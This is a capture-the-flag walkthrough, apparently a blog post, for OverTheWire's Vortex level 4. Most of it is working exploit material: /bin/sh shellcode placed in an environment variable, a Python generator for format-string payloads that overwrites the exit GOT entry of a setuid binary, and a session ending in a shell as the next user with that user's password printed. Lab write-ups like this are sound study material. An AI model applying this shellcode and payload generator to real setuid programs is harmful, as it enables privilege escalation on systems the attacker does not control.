# Vortex wargame: Level 4


# ssh vortex4@vortex.labs.overthewire.org
vortex4@vortex.labs.overthewire.org's password:32596d674b313d6a77

$ file /vortex/vortex4
/vortex/vortex4: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=11041f50a7845267e6d05f6f11dd37de0a33d423, not stripped

$ mkdir /tmp/v4
$ cd /tmp/v4
$ cat execve.c 
#include <unistd.h>

int main(int argc, char **argv){
 char *env[4];
 env[0]="";
 env[1]="EGG=\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
 env[2]=argv[2];
 env[3]=NULL;
 execve(argv[1], NULL, env);
}
$ gcc -m32 -o execve execve.c
$ cat getenvaddr.c
#include <stdio.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr = getenv("EGG");
 ptr += 3;
        printf("%s will be at %p\n", "EGG", ptr);
        return 0;
}
$ gcc -m32 -o getenvaddr getenvaddr.c
$ cat format_string.py
#!/usr/bin/python

import sys
import struct

def whatprinted(what, printed):
 while what <= printed:
  what += 0x100
 what -= printed
 return what, what + printed

def fs_4writes(what, where, printed, init):
 mask     = 0xff
 printed  = 16 + printed # (4 bytes * 4 where_addresses) + printed
 what_b0  = (what      ) & mask
 what_b1  = (what >>  8) & mask
 what_b2  = (what >> 16) & mask
 what_b3  = (what >> 24) & mask

 what_b0, printed = whatprinted(what_b0, printed)
 what_b1, printed = whatprinted(what_b1, printed)
 what_b2, printed = whatprinted(what_b2, printed)
 what_b3, printed = whatprinted(what_b3, printed)

 return  struct.pack('<I',  where     ) + \
  struct.pack('<I', (where + 1)) + \
  struct.pack('<I', (where + 2)) + \
  struct.pack('<I', (where + 3)) + \
  ('%%%dc'    % what_b0  ) + \
  ('%%%d$hhn' % init     ) + \
  ('%%%dc'    % what_b1  ) + \
  ('%%%d$hhn' % (init + 1)     ) + \
  ('%%%dc'    % what_b2  ) + \
  ('%%%d$hhn' % (init + 2)     ) + \
  ('%%%dc'    % what_b3  ) + \
  ('%%%d$hhn' % (init + 3)     )

if len(sys.argv) == 7:

 mode    = sys.argv[1]
 what    = int(sys.argv[2], 16)
 where   = int(sys.argv[3], 16)
 printed = int(sys.argv[4])
 init    = int(sys.argv[5])
 align   = int(sys.argv[6])

 fs = fs_4writes(what, where, printed, init)
 align = '#' * align

 if mode == 'findinit':
  pop =   '%' + str(init) + '$x'
  pop += '-' * (len(fs) - len(pop))
  payload = pop + align
 elif mode == 'exploit':
  payload = fs  + align

 print payload
else:
 print sys.argv[0], '<mode> <what> <where> <printed> <init> <padding>'
$ gdb /vortex/vortex4
(gdb) set disassembly-flavor intel
(gdb) disassemble main
   0x0804844d <+0>: push   ebp
   0x0804844e <+1>: mov    ebp,esp
   0x08048450 <+3>: and    esp,0xfffffff0
   0x08048453 <+6>: sub    esp,0x10
   0x08048456 <+9>: cmp    DWORD PTR [ebp+0x8],0x0 argc =? 0
   0x0804845a <+13>: je     0x8048468 <main+27>
   0x0804845c <+15>: mov    DWORD PTR [esp],0x0
   0x08048463 <+22>: call   0x8048330 <exit@plt>
   0x08048468 <+27>: mov    eax,DWORD PTR [ebp+0xc]
   0x0804846b <+30>: add    eax,0xc
   0x0804846e <+33>: mov    eax,DWORD PTR [eax]
   0x08048470 <+35>: mov    DWORD PTR [esp],eax
   0x08048473 <+38>: call   0x8048310 <printf@plt>
   0x08048478 <+43>: mov    DWORD PTR [esp],0x0
   0x0804847f <+50>: call   0x8048330 <exit@plt>
$ readelf -r /vortex/vortex4

Relocation section '.rel.dyn' at offset 0x2ac contains 1 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000206 R_386_GLOB_DAT    00000000   __gmon_start__

Relocation section '.rel.plt' at offset 0x2b4 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a014  00000307 R_386_JUMP_SLOT   00000000   exit
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main

$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffffff 0804a014 0 104 5`
EGG will be at 0xffffdf83
$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffdf83 0804a014 0 104 5`
EGG will be at 0xffffdf85
$ ./execve /vortex/vortex4 `./format_string.py findinit 0xffffdf85 0804a014 0 104 5`; echo
34303125------------------------------------------------------------##### %104 = init
$ ./execve /vortex/vortex4 `./format_string.py exploit 0xffffdf85 0804a014 0 104 5`; echo
$ whoami
vortex5
$ /bin/cat /etc/vortex_pass/vortex5
3a3456746243346c72

No comments: